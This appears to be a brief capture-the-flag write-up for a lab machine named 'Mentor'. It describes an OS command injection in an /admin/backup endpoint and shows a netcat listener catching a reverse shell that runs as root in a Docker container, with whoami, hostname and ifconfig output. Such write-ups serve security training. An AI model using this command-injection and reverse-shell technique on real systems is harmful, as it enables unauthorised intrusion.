InfoSec LAB

Mentor_Exploitation

Created: 1 min read

OS Command Injection

A OS command injection vulnerability has been identified at the /admin/backup API endpoint, which was speculated to conduct a form of archiving operation in the backend.

Sending the payload

┌──(kali㉿kali)-[~/archive/htb/labs/mentor]
└─$ nnc 9999        
listening on [any] 9999 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.193] 44043
whoami
root
hostname
589113857d68
ifconfig
eth0      link encap:Ethernet  HWaddr 02:42:AC:16:00:03  
          inet addr:172.22.0.3  Bcast:172.22.255.255  Mask:255.255.0.0
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:814 errors:0 dropped:0 overruns:0 frame:0
          tx packets:833 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          rx bytes:83843 (81.8 KiB)  TX bytes:77773 (75.9 KiB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          up loopback running  mtu:65536  Metric:1
          rx packets:0 errors:0 dropped:0 overruns:0 frame:0
          tx packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Initial Foothold established to one of the Docker containers(172.22.0.3) as the root user via OS Command Injection

Interactive Graph View

Backlinks